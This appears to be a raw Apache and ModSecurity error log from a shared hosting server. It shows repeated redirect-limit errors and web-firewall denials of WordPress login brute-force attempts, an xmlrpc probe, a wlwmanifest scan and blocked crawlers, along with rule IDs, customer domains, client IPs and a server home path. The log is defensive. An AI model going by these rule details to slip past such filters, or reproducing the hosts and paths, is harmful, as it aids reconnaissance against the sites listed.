[Tue May 26 18:31:31.297612 2026] [core:error] [pid 998632:tid 998863] [client 45.148.10.204:32928] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.314554 2026] [core:error] [pid 998632:tid 998899] [client 45.148.10.204:32930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.314571 2026] [core:error] [pid 998632:tid 998899] [client 45.148.10.204:32930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.337248 2026] [core:error] [pid 998632:tid 998861] [client 45.148.10.204:32942] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.337274 2026] [core:error] [pid 998632:tid 998861] [client 45.148.10.204:32942] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.425642 2026] [core:error] [pid 998632:tid 998858] [client 45.148.10.204:32958] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.425667 2026] [core:error] [pid 998632:tid 998858] [client 45.148.10.204:32958] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.455222 2026] [core:error] [pid 998632:tid 998827] [client 45.148.10.204:32968] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.455244 2026] [core:error] [pid 998632:tid 998827] [client 45.148.10.204:32968] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.457827 2026] [core:error] [pid 998632:tid 998917] [client 45.148.10.204:32976] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.457866 2026] [core:error] [pid 998632:tid 998917] [client 45.148.10.204:32976] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.487292 2026] [core:error] [pid 998632:tid 998808] [client 45.148.10.204:32978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.487317 2026] [core:error] [pid 998632:tid 998808] [client 45.148.10.204:32978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.502740 2026] [core:error] [pid 998632:tid 998820] [client 45.148.10.204:32982] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.502758 2026] [core:error] [pid 998632:tid 998820] [client 45.148.10.204:32982] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.564279 2026] [core:error] [pid 998632:tid 998864] [client 45.148.10.204:32992] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.564304 2026] [core:error] [pid 998632:tid 998864] [client 45.148.10.204:32992] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.569020 2026] [core:error] [pid 998632:tid 998833] [client 45.148.10.204:33014] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.569044 2026] [core:error] [pid 998632:tid 998833] [client 45.148.10.204:33014] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.569816 2026] [core:error] [pid 1007701:tid 1007843] [client 45.148.10.204:33024] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.569831 2026] [core:error] [pid 1007701:tid 1007843] [client 45.148.10.204:33024] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.573494 2026] [core:error] [pid 998632:tid 998821] [client 45.148.10.204:33040] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.573512 2026] [core:error] [pid 998632:tid 998821] [client 45.148.10.204:33040] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.573524 2026] [core:error] [pid 998632:tid 998792] [client 45.148.10.204:33008] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.573546 2026] [core:error] [pid 998632:tid 998792] [client 45.148.10.204:33008] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.579740 2026] [core:error] [pid 998632:tid 998811] [client 45.148.10.204:33012] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.579757 2026] [core:error] [pid 998632:tid 998811] [client 45.148.10.204:33012] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.745047 2026] [core:error] [pid 998632:tid 998823] [client 45.148.10.204:33056] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.745071 2026] [core:error] [pid 998632:tid 998823] [client 45.148.10.204:33056] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.822740 2026] [core:error] [pid 998632:tid 998896] [client 45.148.10.204:33070] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.822756 2026] [core:error] [pid 998632:tid 998896] [client 45.148.10.204:33070] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.829856 2026] [core:error] [pid 1007701:tid 1007844] [client 45.148.10.204:33092] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.829885 2026] [core:error] [pid 1007701:tid 1007844] [client 45.148.10.204:33092] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.830989 2026] [core:error] [pid 998632:tid 998800] [client 45.148.10.204:33068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.831011 2026] [core:error] [pid 998632:tid 998800] [client 45.148.10.204:33068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.834935 2026] [core:error] [pid 1007701:tid 1007923] [client 45.148.10.204:33074] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.834952 2026] [core:error] [pid 1007701:tid 1007923] [client 45.148.10.204:33074] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.837670 2026] [core:error] [pid 998632:tid 998822] [client 45.148.10.204:33114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.837682 2026] [core:error] [pid 998632:tid 998822] [client 45.148.10.204:33114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.838100 2026] [core:error] [pid 998632:tid 998815] [client 45.148.10.204:33088] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.838118 2026] [core:error] [pid 998632:tid 998815] [client 45.148.10.204:33088] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.841942 2026] [core:error] [pid 998632:tid 998923] [client 45.148.10.204:33108] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.841959 2026] [core:error] [pid 998632:tid 998923] [client 45.148.10.204:33108] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:32.272710 2026] [security2:error] [pid 1007701:tid 1007949] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZqg05qHzKMxj0enGaowAAAPs"]
[Tue May 26 18:31:34.864231 2026] [security2:error] [pid 1007701:tid 1007855] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZrA05qHzKMxj0enGavAAAAJ0"]
[Tue May 26 18:31:35.455288 2026] [security2:error] [pid 998632:tid 998848] [client 103.240.99.165:52985] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.99.240.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWZr61OTU2dW0MS1EnJywAAADY"], referer: https://anujtradingco.com
[Tue May 26 18:31:35.950366 2026] [security2:error] [pid 998632:tid 998910] [client 62.244.225.226:51210] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWZr61OTU2dW0MS1EnJ1AAAAHE"]
[Tue May 26 18:31:36.788240 2026] [security2:error] [pid 1007701:tid 1007899] [client 103.240.99.165:53890] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWZsA05qHzKMxj0enGa3wAAAMk"], referer: https://anujtradingco.com
[Tue May 26 18:31:36.971907 2026] [security2:error] [pid 998632:tid 998912] [client 124.43.5.103:11719] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZsK1OTU2dW0MS1EnJ2QAAAHM"]
[Tue May 26 18:31:36.972087 2026] [security2:error] [pid 998632:tid 998912] [client 124.43.5.103:11719] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZsK1OTU2dW0MS1EnJ2QAAAHM"]
[Tue May 26 18:31:37.194982 2026] [security2:error] [pid 1007701:tid 1007771] [remote 173.212.233.81:49500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZsQ05qHzKMxj0enGa4gAA7EU"]
[Tue May 26 18:31:37.885026 2026] [security2:error] [pid 998632:tid 998821] [client 14.185.39.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWZsa1OTU2dW0MS1EnJ4wAAAB0"]
[Tue May 26 18:31:38.165838 2026] [security2:error] [pid 1007701:tid 1007933] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZsA05qHzKMxj0enGa3AAAAOs"]
[Tue May 26 18:31:38.835568 2026] [security2:error] [pid 1007701:tid 1007937] [client 66.249.70.108:39347] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "godrejpest.co.in"] [uri "/robots.txt"] [unique_id "ahWZsg05qHzKMxj0enGa_wAAAO8"]
[Tue May 26 18:31:39.620496 2026] [security2:error] [pid 1007701:tid 1007706] [remote 113.190.40.93:29716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWZsw05qHzKMxj0enGbAgAA5QQ"]
[Tue May 26 18:31:39.920909 2026] [security2:error] [pid 1007701:tid 1007866] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZsg05qHzKMxj0enGa-gAAAKg"]
[Tue May 26 18:31:40.676585 2026] [security2:error] [pid 1007701:tid 1007777] [remote 173.212.233.81:49500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZtA05qHzKMxj0enGbDgAA1Us"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:31:41.272244 2026] [security2:error] [pid 1007701:tid 1007804] [remote 34.100.157.153:2560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 153.157.100.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZtA05qHzKMxj0enGbFwAA6GY"]
[Tue May 26 18:31:43.123156 2026] [security2:error] [pid 1007701:tid 1007872] [client 114.119.148.132:29371] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dgssi.in"] [uri "/images_abouttheorder/Rahab%20of%20Jericho.jpg"] [unique_id "ahWZtw05qHzKMxj0enGbPQAAAK4"], referer: http://dgssi.in/dgssi-theorder-history.htm
[Tue May 26 18:31:44.006069 2026] [security2:error] [pid 998632:tid 998841] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZta1OTU2dW0MS1EnKEgAAAC8"]
[Tue May 26 18:31:46.313614 2026] [security2:error] [pid 1007701:tid 1007898] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZuA05qHzKMxj0enGbUAAAAMg"]
[Tue May 26 18:31:46.824714 2026] [security2:error] [pid 1007701:tid 1007812] [remote 208.109.188.137:59400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZug05qHzKMxj0enGbdwAA8G4"]
[Tue May 26 18:31:47.293136 2026] [security2:error] [pid 1007701:tid 1007950] [client 124.43.5.103:50288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZuw05qHzKMxj0enGbgAAAAPw"]
[Tue May 26 18:31:47.293262 2026] [security2:error] [pid 1007701:tid 1007950] [client 124.43.5.103:50288] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZuw05qHzKMxj0enGbgAAAAPw"]
[Tue May 26 18:31:47.885470 2026] [security2:error] [pid 1007701:tid 1007813] [remote 141.95.202.18:42802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWZuw05qHzKMxj0enGbiQAA3G8"]
[Tue May 26 18:31:48.291055 2026] [security2:error] [pid 1007701:tid 1007894] [client 31.57.184.107:64352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.lifestylemne.me.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWZvA05qHzKMxj0enGbkgAAAMQ"], referer: https://t.co/
[Tue May 26 18:31:48.981312 2026] [security2:error] [pid 1007701:tid 1007887] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZug05qHzKMxj0enGbcAAAAL0"]
[Tue May 26 18:31:49.927189 2026] [security2:error] [pid 1007701:tid 1007934] [client 46.184.21.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZuw05qHzKMxj0enGbfwAAAOw"]
[Tue May 26 18:31:51.875053 2026] [security2:error] [pid 998632:tid 998793] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZva1OTU2dW0MS1EnKdAAAAAI"]
[Tue May 26 18:31:54.197378 2026] [security2:error] [pid 998632:tid 998846] [client 143.198.114.199:62853] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "sandbox.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWZwq1OTU2dW0MS1EnKpwAAADQ"]
[Tue May 26 18:31:54.325106 2026] [security2:error] [pid 1007701:tid 1007850] [client 130.51.20.151:63334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 151.20.51.130.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWZwQ05qHzKMxj0enGb2AAAAJg"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 18:31:54.325281 2026] [security2:error] [pid 1007701:tid 1007850] [client 130.51.20.151:63334] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWZwQ05qHzKMxj0enGb2AAAAJg"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 18:31:54.759922 2026] [security2:error] [pid 1007701:tid 1007916] [client 130.51.20.151:63388] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWZwg05qHzKMxj0enGb5QAAANo"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 18:31:55.205734 2026] [security2:error] [pid 998632:tid 998911] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZv61OTU2dW0MS1EnKlwAAAHI"]
[Tue May 26 18:31:56.226454 2026] [security2:error] [pid 998632:tid 998901] [client 114.119.141.79:53297] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.traderscafe.in"] [uri "/webinars/febinars/tradezilla-5-0-nov-edition/"] [unique_id "ahWZxK1OTU2dW0MS1EnKswAAAGg"], referer: https://www.traderscafe.in/webinars/
[Tue May 26 18:31:56.516908 2026] [security2:error] [pid 1007701:tid 1007718] [remote 162.214.121.181:54398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 181.121.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZxA05qHzKMxj0enGb-QAAhhA"]
[Tue May 26 18:31:57.423562 2026] [security2:error] [pid 1007701:tid 1007866] [client 172.98.32.27:46241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWZxQ05qHzKMxj0enGcCAAAAKg"]
[Tue May 26 18:31:57.757872 2026] [core:crit] [pid 998632:tid 998902] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:31:57.856561 2026] [security2:error] [pid 1007701:tid 1007892] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZww05qHzKMxj0enGb7AAAAMI"]
[Tue May 26 18:31:58.125344 2026] [security2:error] [pid 998632:tid 998878] [client 124.43.5.103:12613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZxq1OTU2dW0MS1EnKwwAAAFM"]
[Tue May 26 18:31:58.125570 2026] [security2:error] [pid 998632:tid 998878] [client 124.43.5.103:12613] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZxq1OTU2dW0MS1EnKwwAAAFM"]
